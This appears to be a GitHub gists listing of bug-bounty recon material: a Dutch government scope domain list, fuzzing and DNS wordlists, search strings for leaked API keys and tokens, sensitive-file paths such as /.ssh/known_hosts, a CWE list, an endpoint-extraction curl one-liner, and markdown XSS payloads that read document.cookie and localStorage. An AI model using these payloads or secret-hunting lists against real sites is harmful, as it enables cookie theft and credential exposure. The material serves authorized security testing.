Skip to content

Instantly share code, notes, and snippets.

@moodiabdoul3
moodiabdoul3 / DutchGov.txt
Created August 26, 2019 00:53 — forked from random-robbie/DutchGov.txt
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope
0800-8051.nl
0900-8844.nl
09008844.nl
112test.nl
1813-2013.nl
1meter35.nl
2013russiaholland.nl
247bz.nl
8000488.nl
8007000.nl
@moodiabdoul3
moodiabdoul3 / List of API endpoints & objects
Created January 7, 2020 23:15
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
@moodiabdoul3
moodiabdoul3 / vuln_list.txt
Created January 16, 2020 02:14 — forked from Lopseg/vuln_list.txt
150 vulnerability types that you can submit for. Thanks to @thecybermentor and hackerone.
Account Hijacking
Allocation of Resources Without Limits or Throttling - CWE-770
Array Index Underflow - CWE-129
Authentication Bypass Using an Alternate Path or Channel - CWE-288
Brute Force - CWE-307
Buffer Over-read - CWE-126
Buffer Underflow - CWE-124
Buffer Under-read - CWE-127
Business Logic Errors - CWE-840
Classic Buffer Overflow - CWE-120
@moodiabdoul3
moodiabdoul3 / all.txt
Created January 17, 2020 22:02 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@moodiabdoul3
moodiabdoul3 / short-wordlist.txt
Last active February 29, 2020 16:42 — forked from tomnomnom/short-wordlist.txt
short-wordlist
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore
/.s3cfg | grep -Hnri "website_endpoint"
/phpunit.xml | grep -Hnri "<\phpunit"
/nginx.conf | grep -Hnri '/var/run/'
/.vimrc | grep -Hnri 'vim-'
/yarn.lock | grep -Hnri 'yarn lockfile'
/.idea/workspace.xml | grep -Hnri '<project version="4">'
/composer.json | grep -Hnri '"autoload"'
/Homestead.yaml | grep -Hnri 'provider: virtualbox'
/Vagrantfile | grep -Hnri 'VAGRANTFILE_API_VERSION'
/.ssh/known_hosts | grep -Hnri 'ssh-rsa'
@moodiabdoul3
moodiabdoul3 / ejs.sh
Created April 25, 2020 10:32 — forked from gwen001/ejs.sh
onliner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# debug mode and absolute/relative urls support (the best one):
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d